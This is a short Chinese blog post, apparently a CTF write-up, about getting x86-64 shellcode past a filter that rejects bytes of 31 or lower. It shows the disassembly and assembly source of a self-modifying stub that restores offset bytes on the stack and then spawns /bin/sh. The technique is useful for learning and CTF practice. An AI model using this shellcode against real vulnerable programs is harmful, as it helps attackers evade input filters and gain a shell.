首页 > 编程入门 文章详情

Shellcode——绕过31

编程入门 行业动态 更新时间:2024-10-19 07:29:56

<a href=https://www.elefans.com/category/jswz/34/1745123.html style=Shellcode——绕过31"/>

Shellcode——绕过31

遇到了一道ctf题目,要求shellcode的每一个字节都必须大于31。

如果没有这个限制的话:

这是最方便的了。

但是必须大于31.

所以我想,那就吧所有小于31的加上31,然后运行的时候这部分代码自己修改自己。

也就是SMC,,简称自修改代码。

要注意:
小端输入
rsp寻址

~/Desktop/111 
❯ objdump -d ./shellcode -M intel./shellcode:     file format elf64-x86-64Disassembly of section .text:0000000000401000 <_start>:401000:	48 b8 32 41 37 32 32 	movabs rax,0x3232323232374132401007:	32 32 32 40100a:	50                   	push   rax40100b:	48 b8 31 f6 31 d2 b8 	movabs rax,0x32323bb8d231f631401012:	3b 32 32 401015:	50                   	push   rax401016:	48 b8 2f 73 68 32 57 	movabs rax,0xe78948573268732f40101d:	48 89 e7 401020:	50                   	push   rax401021:	48 b8 31 c0 48 bf 2f 	movabs rax,0x6e69622fbf48c031401028:	62 69 6e 40102b:	50                   	push   rax40102c:	68 32 32 32 32       	push   0x32323232401031:	68 32 32 32 32       	push   0x32323232401036:	68 32 32 32 32       	push   0x3232323240103b:	68 32 32 32 32       	push   0x32323232401040:	8a 44 24 2b          	mov    al,BYTE PTR [rsp+0x2b]401044:	2c 32                	sub    al,0x32401046:	88 44 24 2b          	mov    BYTE PTR [rsp+0x2b],al40104a:	8a 44 24 36          	mov    al,BYTE PTR [rsp+0x36]40104e:	2c 32                	sub    al,0x32401050:	88 44 24 36          	mov    BYTE PTR [rsp+0x36],al401054:	8a 44 24 37          	mov    al,BYTE PTR [rsp+0x37]401058:	2c 32                	sub    al,0x3240105a:	88 44 24 37          	mov    BYTE PTR [rsp+0x37],al40105e:	8a 44 24 38          	mov    al,BYTE PTR [rsp+0x38]401062:	2c 32                	sub    al,0x32401064:	88 44 24 38          	mov    BYTE PTR [rsp+0x38],al401068:	8a 44 24 39          	mov    al,BYTE PTR [rsp+0x39]40106c:	2c 32                	sub    al,0x3240106e:	88 44 24 39          	mov    BYTE PTR [rsp+0x39],al401072:	8a 44 24 3a          	mov    al,BYTE PTR [rsp+0x3a]401076:	2c 32                	sub    al,0x32401078:	88 44 24 3a          	mov    BYTE PTR [rsp+0x3a],al40107c:	48 83 c4 20          	add    rsp,0x20401080:	48 89 e7             	mov    rdi,rsp401083:	ff e7                	jmp    rdi

asm代码:

section .textglobal _start_start:; 打开 /bin/shmov rax, 0x3232323232374132push rax;11mov rax, 0x32323bb8d231f631push rax;22 23mov rax, 0xe78948573268732fpush rax;24 25 26 27 28 29 30 31mov rax, 0x6e69622fbf48c031push raxpush 0x32323232push 0x32323232  push 0x32323232  push 0x32323232mov al, [rsp+31+12]sub al, 0x32mov [rsp+31+12], almov al, [rsp+31+23]sub al, 0x32mov [rsp+31+23], almov al, [rsp+31+24]sub al, 0x32mov [rsp+31+24], almov al, [rsp+31+25]sub al, 0x32mov [rsp+31+25], almov al, [rsp+31+26]sub al, 0x32mov [rsp+31+26], almov al, [rsp+31+27]sub al, 0x32mov [rsp+31+27], aladd rsp,32mov rdi,rspjmp rdi;mov rdi, rsp;xor esi, esi;xor edx, edx;mov eax, 0x3b;syscall

更多推荐

Shellcode——绕过31

本文发布于:2023-12-03 07:19:26,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1652589.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:Shellcode

发布评论

评论列表 (有 0 条评论)

最近发表

草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!

热门文章

标签列表